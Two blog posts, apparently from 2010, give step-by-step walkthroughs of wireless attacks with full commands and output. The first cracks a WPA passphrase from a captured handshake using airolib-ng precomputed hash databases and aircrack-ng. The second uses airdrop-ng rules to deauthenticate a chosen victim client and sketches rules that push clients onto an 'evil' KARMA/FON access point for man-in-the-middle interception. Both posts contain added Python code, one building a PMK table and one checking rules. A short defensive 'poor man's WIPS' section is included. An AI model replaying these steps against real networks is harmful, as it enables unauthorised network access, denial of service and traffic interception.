Friday, February 19, 2010

Airolib-ng WPA cracking walk through

I used to crack my WPA passwords with cowpatty precomputed hashes, but another way to crack WPA with precomputed hashes is to create airolib databases from lists of SSIDs and passwords. Airolib-ng stores these databases in SQLite3. This is convenient because each database can hold more than one SSID and password list. If you are in an area with multiple SSIDs running WPA you can note all of the SSIDs in a list and import them into the database. That matters when doing a packet capture in an environment with multiple WPA-encrypted networks: the attacker can crack any of the captured 4-way authentication handshakes with the same database file. Below is a play-by-play of cracking a WPA wireless network using the airolib/aircrack method.
Note: I assume you already have a packet capture of a handshake. If not, just run airodump until you obtain a handshake, or for the sake of practice you can turn your victim card off and on to catch a handshake while airodump is running on that channel. I also assume you know the old way of cracking WPA. If not, I can post a guide on how to do that.

Setting up the databases:
First you need to create a SQLite3 database and import some SSIDs into it. If the database does not exist yet, airolib-ng will create it for you automatically. Create a list of SSIDs from your airodump output, then use the airolib-ng command in the following format.

airolib-ng <database> --import essid <ssid list file>

Create SSID list:
Example:
root@ficti0n:~# airolib-ng wpaDatabase --import essid ssidlist.txt
Database does not already exist, creating it...
Database sucessfully created
Reading file...
Writing...
Done.

Next, import your password list into the same database. The format is the same as for the SSIDs, except that the keyword is passwd and the file is your password list. Here is the format, followed by an example.

airolib-ng <database> --import passwd <password list file>

Create Password List:
Example:
root@ficti0n:~# airolib-ng wpaDatabase --import passwd passwords.txt
Reading file...
Writing...
Done.
The next command, clean, is optional. It runs integrity checks on the database and shrinks the database file where possible.

Clean Database:
Example:
root@ficti0n:~# airolib-ng wpaDatabase --clean all
Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
Checking database integrity...
integrity_check
ok
Query done. 2 rows affected.
Done.

Create your PMKs:
After you have imported all your SSIDs and passwords, compute the PMK hashes with the following command.

root@ficti0n:~# airolib-ng wpaDatabase --batch
Computed 21 PMK in 0 seconds (21 PMK/s, 0 in buffer). All ESSID processed.

Cracking:
Now that you have a database of PMK hashes for the WPA SSIDs in your area, you can run a crack against your output cap file to retrieve the password. If all goes well and the network's password is in your database, you are done.

Example:
root@ficti0n:~# aircrack-ng -r wpaDatabase Output-02.cap
Opening Output-02.cap
Read 3347 packets.
   #  BSSID                               ESSID                     Encryption
   1  00:18:F8:66:7E:CC        ficti0nAP               WPA (1 handshake)
Choosing first network as target.
Opening Output-02.cap
                                 Aircrack-ng 1.0 r1645
                   [00:00:00] 1 keys tested (240.91 k/s)
                         KEY FOUND! [ MyPassword ] 
      Master Key     : 81 91 38 43 93 E5 28 6C 38 3F 3A 79 88 06 53 80
                       67 D5 24 01 6B BD 44 E6 5B D3 78 92 CE 85 66 60
      Transient Key  : A1 91 0B E1 2D 1C D9 31 73 A1 2B 7B 51 4E E6 C0
                       FE A9 61 49 0E B1 0B 19 76 D6 54 9D A4 4B 7B E3
                       00 05 DB 2B 90 0E DF DB F7 AB D2 53 26 6C E5 C9
                       1B 4B 73 1D 9D 94 15 9D 1E 51 79 94 F8 64 97 67
      EAPOL HMAC     : 15 55 71 33 DB A8 2C 6F 82 74 1E BF 70 72 1B F0
Quitting aircrack-ng...

Optional:
Another useful option: if you want to crack all the WPA networks but give one specific network priority, run the following SQL command through airolib-ng to set that network's priority in the database.
root@ficti0n:~#  airolib-ng wpaDatabase --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="ficti0nAP";'
Query done. 1 rows affected.
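To make the whole airolib-ng flow above concrete (import essid, import passwd, the length check that --clean applies, --batch, and the --sql priority trick), here is an added example in pure Python using only the standard library. It is not code from the post or from aircrack-ng; the essid/passwd/pmk table layout and column names are an assumption that mirrors airolib-ng's three tables in spirit, not its real schema. The derivation itself is the public IEEE 802.11i passphrase-to-PSK mapping, and the example is checked against the standard's own test vector (SSID "IEEE", passphrase "password"). The sample SSID and password lists are constructed stand-ins for ssidlist.txt and passwords.txt.

```python
"""Miniature airolib-ng-style PMK table (added example, standard library only).

WPA/WPA2-PSK derives the pairwise master key as
    PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
so a precomputed table only covers the SSIDs it was built for. That is why
airolib-ng keys its PMK table on (essid, passwd) pairs, and why a long
passphrase on a non-default SSID defeats table reuse.

Table layout below: assumption modelled on airolib-ng, not its actual schema.
"""
import hashlib
import sqlite3
from typing import Iterable, List, Optional


def derive_pmk(ssid: str, passphrase: str) -> bytes:
    """IEEE 802.11i passphrase-to-PSK mapping."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def valid_essid(essid: str) -> bool:
    """802.11 SSIDs are 1..32 bytes."""
    return 1 <= len(essid.encode()) <= 32


def valid_passwd(passwd: str) -> bool:
    """WPA-PSK passphrases are 8..63 printable ASCII characters."""
    return 8 <= len(passwd) <= 63 and all(32 <= ord(c) <= 126 for c in passwd)


def create_db(path: str = ":memory:") -> sqlite3.Connection:
    db = sqlite3.connect(path)
    db.executescript("""
        CREATE TABLE IF NOT EXISTS essid (
            essid_id INTEGER PRIMARY KEY, essid TEXT UNIQUE NOT NULL,
            prio INTEGER NOT NULL DEFAULT 64);
        CREATE TABLE IF NOT EXISTS passwd (
            passwd_id INTEGER PRIMARY KEY, passwd TEXT UNIQUE NOT NULL);
        CREATE TABLE IF NOT EXISTS pmk (
            essid_id INTEGER NOT NULL, passwd_id INTEGER NOT NULL, pmk BLOB NOT NULL,
            PRIMARY KEY (essid_id, passwd_id));
    """)
    return db


def _count(db: sqlite3.Connection, table: str) -> int:
    return db.execute(f"SELECT COUNT(*) FROM {table}").fetchone()[0]


def import_essids(db: sqlite3.Connection, essids: Iterable[str]) -> int:
    """Like --import essid: add valid, not-yet-present SSIDs; return how many were added."""
    before = _count(db, "essid")
    db.executemany("INSERT OR IGNORE INTO essid (essid) VALUES (?)",
                   [(e,) for e in essids if valid_essid(e)])
    db.commit()
    return _count(db, "essid") - before


def import_passwds(db: sqlite3.Connection, passwds: Iterable[str]) -> int:
    """Like --import passwd, dropping invalid passphrases up front (what --clean would remove)."""
    before = _count(db, "passwd")
    db.executemany("INSERT OR IGNORE INTO passwd (passwd) VALUES (?)",
                   [(p,) for p in passwds if valid_passwd(p)])
    db.commit()
    return _count(db, "passwd") - before


def batch(db: sqlite3.Connection) -> int:
    """Like --batch: compute every missing (essid, passwd) PMK, lowest prio value first."""
    todo = db.execute("""
        SELECT e.essid_id, e.essid, p.passwd_id, p.passwd
        FROM essid e CROSS JOIN passwd p
        WHERE NOT EXISTS (SELECT 1 FROM pmk k
                          WHERE k.essid_id = e.essid_id AND k.passwd_id = p.passwd_id)
        ORDER BY e.prio, e.essid_id, p.passwd_id""").fetchall()
    db.executemany("INSERT INTO pmk (essid_id, passwd_id, pmk) VALUES (?, ?, ?)",
                   [(eid, pid, derive_pmk(essid, pw)) for eid, essid, pid, pw in todo])
    db.commit()
    return len(todo)


def set_priority(db: sqlite3.Connection, essid: str) -> int:
    """The post's --sql trick: move one SSID ahead of all others in --batch order."""
    cur = db.execute("UPDATE essid SET prio = (SELECT MIN(prio) - 1 FROM essid) WHERE essid = ?",
                     (essid,))
    db.commit()
    return cur.rowcount


def essid_order(db: sqlite3.Connection) -> List[str]:
    """SSIDs in the order --batch would process them (lower prio value first)."""
    return [row[0] for row in db.execute("SELECT essid FROM essid ORDER BY prio, essid_id")]


def lookup(db: sqlite3.Connection, essid: str, passwd: str) -> Optional[bytes]:
    """PMK for one (essid, passwd) pair, or None if it was never computed."""
    row = db.execute("""
        SELECT k.pmk FROM pmk k
        JOIN essid e ON e.essid_id = k.essid_id
        JOIN passwd p ON p.passwd_id = k.passwd_id
        WHERE e.essid = ? AND p.passwd = ?""", (essid, passwd)).fetchone()
    return bytes(row[0]) if row else None


if __name__ == "__main__":
    # Constructed sample lists standing in for ssidlist.txt and passwords.txt.
    db = create_db()
    print("essids added:", import_essids(db, ["IEEE", "ficti0nAP", ""]))
    print("passwds added:", import_passwds(db, ["password", "short", "MyPassword"]))
    set_priority(db, "ficti0nAP")
    print("batch order:", essid_order(db), "computed:", batch(db))
    print("PMK(IEEE, password) =", lookup(db, "IEEE", "password").hex())
```

The 4096 PBKDF2 iterations are the whole reason the table is worth building in advance and, from the defender's side, the reason the table is useless against an SSID it was not built for: every SSID you did not list costs a full recomputation of the password list.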



Monday, February 15, 2010

Airdrop-ng Basics on BT4 Final


De-Authentication and Client Manipulation

Over the last few days I have been playing with Airdrop-NG; it seems like a simple yet effective wireless attack tool. I have had some issues with its functionality, but these issues might be AP related, and it seemed to work more consistently after installing psyco. Below are my notes on using Airdrop-ng and also the information from ShmooCon 2010. This tool should be released to the public in a week or so and has a lot of potential. I will post more info later as I explore Airdrop-NG's functionality. This is just some basic usage. More advanced uses and coding projects to follow.

Description:

Airdrop-NG is a wireless de-authentication tool released at ShmooCon 2010 which can also double as a poor man's WIPS, depending on your intentions. Airdrop-NG is a rule-based tool that is simple to configure and easy to use. Each rules file can allow or deny traffic using client station MACs, BSSIDs and a few other descriptors. Rules can be updated while the program is running in a loop, making for easy on-the-fly changes within your attack. On each loop Airdrop-NG reparses the rules file and continues sending packets based on a CSV output from airodump-ng.

Below is a walkthrough of setting up the tool on BT4 and configuring it to attack a single client station on its BSSID. The install scripts and configurations are intuitive and quick to get working. I had zero install issues on BT4 Final; Pre-Final, however, did give me problems.

Install airdrop-ng:
root@ficti0n:~/# cd airdrop-ng
root@ficti0n:~/airdrop-ng# python install.py

Checking for dependancies used by the installer...
All dependancies installed! Continuing...

#### NOTE: For Ubuntu based distro's,
python2.6-dev must be installed. Please
make sure it is installed before continuing!

Welcome to the airdrop-ng installer!
You will be prompted for installing
Airdrop-ng, lorcon, and pylorcon.

Continue with installer? (y/n): y
Install airdrop-ng? (y/n): y
Build exist?
Didn't exist. Creating...
Files copied. Now, moving to directory...
Moving airdrop-ng to /usr/bin, lib to
/usr/lib/airdrop-ng, and installing man pages...
airdrop-ng installed!  =)
Would you like to install lorcon? (y/n): y
Running svn co http://802.11ninja.net/svn/lorcon/branch/lorcon-old. This may take a while...
A    lorcon-old/rt2500inject.h
A    lorcon-old/lorcon_decode.c
A    lorcon-old/lorcon_packasm.h
A    lorcon-old/tx80211_errno.h
A    lorcon-old/Makefile.in
A    lorcon-old/rt73inject.h
A    lorcon-old/madwifing_control.c

..........................
.................................................
copying build/lib.linux-i686-2.5/pylorcon.so -> /usr/lib/python2.5/site-packages
running install_egg_info
Removing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Writing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Clean up? (y/n): y
Operation(s) complete! May the source be with you. =)


Install Psyco for more power:
root@ficti0n:~/# apt-get install python-psyco
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  python-psyco
0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
Need to get 270kB of archives.
After this operation, 766kB of additional disk space will be used.
Get:1 http://archive.offensive-security.com pwnsauce/universe python-psyco 1.6-1 [270kB]
Fetched 270kB in 2s (122kB/s)
Selecting previously deselected package python-psyco.
(Reading database ... 225714 files and directories currently installed.)
Unpacking python-psyco (from .../python-psyco_1.6-1_i386.deb) ...
Setting up python-psyco (1.6-1) ...



Setup Wireless Interface:

root@ficti0n:~/# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
5757    dhclient3
Interface       Chipset         Driver
wlan0           RTL8187         rtl8187 - [phy0]
                                (monitor mode enabled on mon0)


Switch to another shell and run airodump:
(leave airodump running)
root@ficti0n:~/# airodump-ng -w Test --output-format csv mon0

CH  6 ][ Elapsed: 10 mins ][ 2010-02-15 18:30 ][ WPA handshake: 02:1F:38:65:AE:EF
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 02:5B:6B:4E:6C:6F   -1       26        1    0  11  54 . WEP  WEP         Testing
 02:1F:28:65:AE:ED  -24      489      391    0   1  54e  WPA2 CCMP   PSK  ficti0nsAP
 00:0B:85:6C:2D:4F  -71       48        0    0   1  54 . WEP  WEP         Linksys
 00:1B:85:6E:2D:4D  -72       48        0    0   1  54 . WEP  WEP
 06:0B:85:6C:7D:4E  -71       45        0    0   1  54 . OPN   

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 (not associated)   02:16:08:AD:6E:95  -67    0 - 1      0        3
 (not associated)   00:A0:F8:B8:DF:69  -73    0 - 1    120       39  Linksys
 (not associated)   00:24:36:74:F1:97  -53    0 - 1      0       57
 02:0B:65:4E:6C:62  02:17:6B:20:00:ED  -72    0 - 1    124       27
 02:1F:28:65:AE:ED  00:23:4E:DF:AE:70    0   54e- 1e   979      444
 02:1F:28:65:AE:ED  00:21:00:DB:60:00  -28    0 - 1     67       91  ficti0nsAP
 02:1F:28:65:AE:ED  00:21:6A:11:0E:52  -38    1e- 2e     0      212  ficti0nsAP
 02:1F:28:65:AE:ED  00:2E:45:9F:87:AC  -38    1e- 6e     0      194  ficti0nsAP
 02:1F:28:65:AE:ED  00:23:3E:DF:ED:ED  -42   54e- 1      0       63  ficti0nsAP
 02:1F:28:65:AE:ED  00:25:08:AD:50:7C  -51   54e-24      0        2
 02:1F:28:65:AE:ED  00:1E:C2:C4:E5:79  -67    1e- 1      0       94  ficti0nsAP



Edit the example rules file:
You will need some rules that Airdrop-NG can use when attacking clients. I will explain a bit about the rules from the ShmooCon presentation, then we will add a rule to our rules.conf.

Rules are broken down into 3 fields (state/ap|clients):


2 options for state field:

-Allow
-Deny

5 options for AP field:
-ESSID
-BSSID
-Company OUI name value
-Company OUI numeric value
-any

5 options for clients field:
-mac
-multiple macs  (ex. mac1,mac2,mac3)
-Company OUI name value
-Company OUI numeric value
-any

Add your rule. Example:
Below is a rule that denies all traffic to the following client "01-23-5E-DF-AE-50" from a specified BSSID.

Example Deny Rule:
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50

Rule explanation:
d = deny
/02:1F:28:65:AE:ED   <-- the AP's BSSID; get this address from the airodump output
|01-23-5E-DF-AE-50   <-- in this case a client's address


Run airdrop with new rule:
(Leave airodump running during this!!)
Now run Airdrop-NG with the rules file you created above and your CSV output file from airodump-ng. Airdrop-NG will loop through the rules file every second until you terminate the process. This will hopefully keep your victim from having network access.

root@ficti0n:~/# python airdrop-ng.py -b -i mon0 -t /root/Test-01.csv  -r docs/dropRules.conf
#################################################
#             Welcome to AirDrop-ng             #
#################################################

Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops

Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops

Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

.....................
...............................

Airdrop-ng will now exit
Sent 164 Packets

Exiting Program, Please take your card mon0 out of monitor mode


Poor Man’s WIPS:

Now for the defensive portion of this walkthrough. Let’s say you want to keep your client stations from roaming over to an evil Fon or a Karma AP. You can try this with the following setup.

Create a list of your station MACs:

11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Create the list of your AP BSSIDs:
AB:AD:F2:14:00:00
EA:CF:DF:AD:00:00

Rules:
Create a WIPS Rules file with the following rules

Allow 3 clients to talk to AB:AD:F2:14:00:00
a/AB:AD:F2:14:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Allow 3 clients to talk to EA:CF:DF:AD:00:00
a/EA:CF:DF:AD:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Deny those 3 clients to any other access points
d/any|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66
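The rule grammar from the "Edit the example rules file" section and the WIPS rule set just above can be exercised without transmitting anything. The following is an added example, not code from the post or from airdrop-ng: it parses state/ap|clients rule lines, reads the station section of an airodump-ng CSV (the file --output-format csv writes) and reports, for every observed client/AP association, whether the rules allow it, deny it, or say nothing. That turns the same rules file into the WIPS alert list: a deny verdict is a tracked station sitting on an AP you did not approve. Assumptions, since the page does not state them: the first matching rule wins, lines starting with # are comments, a numeric OUI is written as a 3-octet prefix, vendor-name OUIs are not handled, and the CSV column positions are my understanding of airodump-ng's layout (ESSID is the 14th field of the AP section, BSSID the 6th of the station section). The rules and CSV embedded below are constructed.

```python
"""Rule checker for airdrop-ng style rules (added example, report-only)."""
import csv
import re
from dataclasses import dataclass
from io import StringIO
from typing import Dict, List, Optional, Tuple

MAC_RE = re.compile(r"[0-9A-F]{2}(?::[0-9A-F]{2}){5}")
OUI_RE = re.compile(r"[0-9A-F]{2}(?::[0-9A-F]{2}){2}")   # 3-octet prefix (assumption)


def norm_mac(mac: str) -> str:
    """Upper-case, colon-separated form (the post mixes ':' and '-')."""
    return mac.strip().upper().replace("-", ":")


def _norm_target(t: str) -> str:
    t = t.strip()
    if t.lower() == "any":
        return "any"
    m = norm_mac(t)
    return m if MAC_RE.fullmatch(m) or OUI_RE.fullmatch(m) else t   # else treated as an ESSID


@dataclass
class Rule:
    raw: str
    state: str           # 'a' allow / 'd' deny
    ap: str              # BSSID, OUI prefix, ESSID, or 'any'
    clients: List[str]   # client MACs / OUI prefixes, or ['any']


def parse_rule(line: str) -> Rule:
    state, rest = line.split("/", 1)
    ap, clients = rest.split("|", 1)
    state = state.strip().lower()
    if state not in ("a", "d"):
        raise ValueError(f"unknown state in rule: {line!r}")
    return Rule(line, state, _norm_target(ap), [_norm_target(c) for c in clients.split(",")])


def parse_rules(text: str) -> List[Rule]:
    lines = (s.strip() for s in text.splitlines())
    return [parse_rule(l) for l in lines if l and not l.startswith("#")]


def _matches(target: str, mac: str, essid: Optional[str] = None) -> bool:
    if target == "any":
        return True
    if MAC_RE.fullmatch(target):
        return target == mac
    if OUI_RE.fullmatch(target):
        return mac.startswith(target)
    return essid is not None and target == essid


def verdict(rules: List[Rule], bssid: str, client: str,
            essid: Optional[str] = None) -> Optional[str]:
    """'allow', 'deny', or None when no rule covers the pair (first match wins: assumption)."""
    for r in rules:
        if _matches(r.ap, bssid, essid) and any(_matches(c, client) for c in r.clients):
            return "allow" if r.state == "a" else "deny"
    return None


def parse_airodump_csv(text: str) -> Tuple[Dict[str, str], List[Tuple[str, str]]]:
    """Return ({bssid: essid}, [(bssid, station), ...]); unassociated stations are skipped."""
    essid_of: Dict[str, str] = {}
    pairs: List[Tuple[str, str]] = []
    section = None
    for row in csv.reader(StringIO(text), skipinitialspace=True):
        if not row:
            continue                      # blank line separating the two sections
        head = row[0].strip()
        if head == "BSSID":
            section = "ap"
        elif head == "Station MAC":
            section = "sta"
        elif section == "ap" and len(row) >= 14:
            essid_of[norm_mac(head)] = row[13].strip()
        elif section == "sta" and len(row) >= 6 and not row[5].strip().startswith("(not associated)"):
            pairs.append((norm_mac(row[5]), norm_mac(head)))
    return essid_of, pairs


def evaluate(rules_text: str, csv_text: str) -> List[Tuple[str, str, str, Optional[str]]]:
    """(client, bssid, essid, verdict) for each association seen in the capture."""
    rules = parse_rules(rules_text)
    essid_of, pairs = parse_airodump_csv(csv_text)
    return [(c, b, essid_of.get(b, ""), verdict(rules, b, c, essid_of.get(b))) for b, c in pairs]


def alerts(rules_text: str, csv_text: str) -> List[Tuple[str, str, str]]:
    """Denied pairs only: the WIPS signal that a tracked station joined an unapproved AP."""
    return [(c, b, e) for c, b, e, v in evaluate(rules_text, csv_text) if v == "deny"]


# Constructed WIPS rule set in the post's format (state/ap|clients).
RULES = """\
# allow two stations on the two corporate APs, deny them everywhere else
a/AB:AD:F2:14:00:00|11:22:33:44:55:66,21:2F:33:44:55:66
a/EA:CF:DF:AD:00:00|11:22:33:44:55:66,21:2F:33:44:55:66
d/any|11:22:33:44:55:66,21:2F:33:44:55:66
"""

# Constructed airodump-ng style CSV: two APs, then four stations (one unassociated).
AIRODUMP_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AB:AD:F2:14:00:00, 2010-02-15 18:20:00, 2010-02-15 18:30:00,  1,  54, WPA2, CCMP, PSK, -24,      489,      391,   0.  0.  0.  0,   8, CorpWiFi, 
DE:AD:BE:EF:00:01, 2010-02-15 18:25:00, 2010-02-15 18:30:00,  6,  54, OPN ,  ,  , -60,       40,        0,   0.  0.  0.  0,   8, FreeWiFi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2010-02-15 18:21:00, 2010-02-15 18:30:00, -30,      444, AB:AD:F2:14:00:00, CorpWiFi
21:2F:33:44:55:66, 2010-02-15 18:26:00, 2010-02-15 18:30:00, -45,       12, DE:AD:BE:EF:00:01, FreeWiFi
00:24:36:74:F1:97, 2010-02-15 18:22:00, 2010-02-15 18:30:00, -53,       57, (not associated) , 
00:AA:BB:CC:DD:EE, 2010-02-15 18:27:00, 2010-02-15 18:30:00, -70,        5, DE:AD:BE:EF:00:01, 
"""

if __name__ == "__main__":
    for client, bssid, essid, v in evaluate(RULES, AIRODUMP_CSV):
        print(f"{client} -> {bssid} ({essid or '?'}): {v or 'no rule'}")
```

Run as a script it prints one line per association; the second station (21:2F:33:44:55:66 on the open FreeWiFi AP) is the only deny and therefore the only WIPS alert, while the unknown station 00:AA:BB:CC:DD:EE gets no verdict because no rule names it. Because a catch-all d/any rule only bites for the clients it lists, the order of the allow rules before it is what keeps the approved associations from being flagged.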



MITM Attacks:
An attempted example from ShmooCon was an attack on clients via MITM. This example wasn't shown during the demo because the presenters couldn't get their monitors working correctly. But I imagine the ruleset would be to deny all clients access to the legitimate BSSIDs within your airodump output and allow them all access to your KARMA or perhaps FON AP. The presenters had their own FonRules, which I am guessing would go something similar to the following. I could be way off, but this should function similarly to what I think they were going to show us.

Make a list of local BSSIDs:

AB:AD:F2:14:00:00
EA:CF:DF:AD:00:00

FON MAC:
AB:CD:EF:12:34:56


Add in some new rules:

Deny 3 clients to talk to AB:AD:F2:14:00:00
d/AB:AD:F2:14:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Deny 3 clients to talk to EA:CF:DF:AD:00:00
d/EA:CF:DF:AD:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Allow access to my evil APs:
a/AB:CD:EF:12:34:56|any



I have a couple other ideas for IDS monitoring combining other tools and also some malicious MITM I am messing around with that I will post in future posts... so far Airdrop-ng is a fun tool... enjoy...
--Ficti0n
